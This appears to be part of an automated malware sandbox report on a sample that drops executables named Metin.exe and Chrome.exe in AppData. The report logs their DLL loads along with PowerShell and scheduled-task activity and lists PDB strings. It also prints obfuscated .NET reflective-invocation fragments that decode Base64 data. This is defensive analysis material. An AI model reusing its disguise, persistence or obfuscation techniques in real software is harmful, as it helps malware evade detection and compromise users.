Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
                        Source: Chrome.lnk.9.drLNK file: ..\..\..\..\..\Chrome.exe
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: Binary string: xHPloHC:\Windows\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2529308838.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb|kt source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdbC source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2569540442.0000000005E5B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbe source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @xo.pdbService source: M2.exe, 00000006.00000002.2529308838.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb3v source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: M2.exe, 00000006.00000002.2530123513.0000000000760000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb| source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.P2mf0VG3Z23btQPXTeWoUc4EnGWDH0AGfRKMOWI7J68yK4pVMLXPcLhXhC1hvImrGy0Aey4H2ZuiulBcjOpQ,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.uVzSMwhr8uVTudA4B6vvjwlelEqBmYLIYhH2FdSzaOrmofSlnrIHz0lRml90KCcWtXLQuC7t5pv5yHiCL8Hz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.O1fUh2FqK9YKCXNjVlTAAUZqudBCNKzcmUJuKR8FE4aS3eLyvMiTd2jQ4fdorMK2j9Xac95SEFhJw47CHfCz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.ljCPR1FH8j5yhPI3U9x904OUGdp6iZBBNsKDyUw5nryMnhOyjPQGVMgHek2YxCtwVQKj60buvcDDomD1uqJO,_7DAslXk4aRGtCt1oeUw5TeOhtE._4143yORnHD1dsEVvA8EAP2Yg0h()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QBTQa3EkUuQM9en7BwZr2kZOc9[2],_7DAslXk4aRGtCt1oeUw5TeOhtE._1yCi8e7NkC4yKRwRiC8QMqlmos(Convert.FromBase64String(QBTQa3EkUuQM9en7BwZr2kZOc9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QBTQa3EkUuQM9en7BwZr2kZOc9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.P2mf0VG3Z23btQPXTeWoUc4EnGWDH0AGfRKMOWI7J68yK4pVMLXPcLhXhC1hvImrGy0Aey4H2ZuiulBcjOpQ,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.uVzSMwhr8uVTudA4B6vvjwlelEqBmYLIYhH2FdSzaOrmofSlnrIHz0lRml90KCcWtXLQuC7t5pv5yHiCL8Hz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.O1fUh2FqK9YKCXNjVlTAAUZqudBCNKzcmUJuKR8FE4aS3eLyvMiTd2jQ4fdorMK2j9Xac95SEFhJw47CHfCz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.ljCPR1FH8j5yhPI3U9x904OUGdp6iZBBNsKDyUw5nryMnhOyjPQGVMgHek2YxCtwVQKj60buvcDDomD1uqJO,_7DAslXk4aRGtCt1oeUw5TeOhtE._4143yORnHD1dsEVvA8EAP2Yg0h()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QBTQa3EkUuQM9en7BwZr2kZOc9[2],_7DAslXk4aRGtCt1oeUw5TeOhtE._1yCi8e7NkC4yKRwRiC8QMqlmos(Convert.FromBase64String(QBTQa3EkUuQM9en7BwZr2kZOc9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QBTQa3EkUuQM9en7BwZr2kZOc9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.P2mf0VG3Z23btQPXTeWoUc4EnGWDH0AGfRKMOWI7J68yK4pVMLXPcLhXhC1hvImrGy0Aey4H2ZuiulBcjOpQ,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.uVzSMwhr8uVTudA4B6vvjwlelEqBmYLIYhH2FdSzaOrmofSlnrIHz0lRml90KCcWtXLQuC7t5pv5yHiCL8Hz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.O1fUh2FqK9YKCXNjVlTAAUZqudBCNKzcmUJuKR8FE4aS3eLyvMiTd2jQ4fdorMK2j9Xac95SEFhJw47CHfCz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.ljCPR1FH8j5yhPI3U9x904OUGdp6iZBBNsKDyUw5nryMnhOyjPQGVMgHek2YxCtwVQKj60buvcDDomD1uqJO,_7DAslXk4aRGtCt1oeUw5TeOhtE._4143yORnHD1dsEVvA8EAP2Yg0h()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QBTQa3EkUuQM9en7BwZr2kZOc9[2],_7DAslXk4aRGtCt1oeUw5TeOhtE._1yCi8e7NkC4yKRwRiC8QMqlmos(Convert.FromBase64String(QBTQa3EkUuQM9en7BwZr2kZOc9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QBTQa3EkUuQM9en7BwZr2kZOc9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.P2mf0VG3Z23btQPXTeWoUc4EnGWDH0AGfRKMOWI7J68yK4pVMLXPcLhXhC1hvImrGy0Aey4H2ZuiulBcjOpQ,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.uVzSMwhr8uVTudA4B6vvjwlelEqBmYLIYhH2FdSzaOrmofSlnrIHz0lRml90KCcWtXLQuC7t5pv5yHiCL8Hz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.O1fUh2FqK9YKCXNjVlTAAUZqudBCNKzcmUJuKR8FE4aS3eLyvMiTd2jQ4fdorMK2j9Xac95SEFhJw47CHfCz,kpcP5xsVrhckH4vuD7P6o5DLGLex5HP05TOo3r3SqCsv4VAOPjiqGND76lGrZT3zR1jmYklx7uAlg1eQfRlV.ljCPR1FH8j5yhPI3U9x904OUGdp6iZBBNsKDyUw5nryMnhOyjPQGVMgHek2YxCtwVQKj60buvcDDomD1uqJO,_7DAslXk4aRGtCt1oeUw5TeOhtE._4143yORnHD1dsEVvA8EAP2Yg0h()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QBTQa3EkUuQM9en7BwZr2kZOc9[2],_7DAslXk4aRGtCt1oeUw5TeOhtE._1yCi8e7NkC4yKRwRiC8QMqlmos(Convert.FromBase64String(QBTQa3EkUuQM9en7BwZr2kZOc9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
